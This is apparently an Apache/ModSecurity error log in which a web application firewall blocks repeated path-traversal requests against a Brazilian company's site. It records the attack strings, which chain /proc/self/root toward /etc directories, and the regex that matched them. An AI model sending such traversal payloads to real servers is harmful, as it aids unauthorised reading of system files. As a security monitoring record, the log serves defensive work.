[Wed Mar 18 09:03:12.009357 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:55166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUgOyqAr6etmhZHNqsqQAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:03:38.062581 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:34074] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUmtY0UrI5A3LftIyRYQAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:03:52.741809 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.243.128:57668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUqNY0UrI5A3LftIyRgQAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:03:54.138055 2026] [:error] [pid 11816:tid 140411716749056] [client 74.7.243.128:32910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUquw_le52K8_3pV3OiAAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:03:55.450508 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:32912] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUq-oXxyEfFpUF8f9dCQAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:03:56.775030 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:32914] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUrMdf6f5d65gmYZTDUwAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:03:59.177379 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:32924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUr-yqAr6etmhZHNqs2gAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:04:04.381959 2026] [mime_magic:error] [pid 17653:tid 140411691570944] (70014)End of file found: [client 57.141.18.76:57458] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:04:08.678971 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:55958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUuMdf6f5d65gmYZTDaQAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:04:09.997075 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:32976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUucdf6f5d65gmYZTDagAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:04:13.506352 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:32984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUveoXxyEfFpUF8f9dDwAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:04:14.957249 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.243.128:32986] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUvimAPhZkrhU8w4lb8QAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:04:20.207069 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.243.128:32986] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUxCmAPhZkrhU8w4lb-QAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:04:21.931383 2026] [:error] [pid 11816:tid 140411716749056] [client 74.7.243.128:43900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUxew_le52K8_3pV3OmQAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:04:30.270687 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:43908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUzgkwaGbbGflqUZD_fgAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:04:32.663974 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:47940] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU0OoXxyEfFpUF8f9dHQAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:04:33.955256 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:47942] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU0QkwaGbbGflqUZD_iAAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:04:37.293560 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:47946] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU1OyqAr6etmhZHNqtDgAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:04:45.122345 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:49752] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU3eyqAr6etmhZHNqtHgAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:04:49.111283 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:47960] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU4fu8EFLIOrSqIpv0CQAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:04:50.331140 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.243.128:55332] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU4kzinOy1jxa1j4cCugAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:04:53.795113 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:55344] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU5eoXxyEfFpUF8f9dJwAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
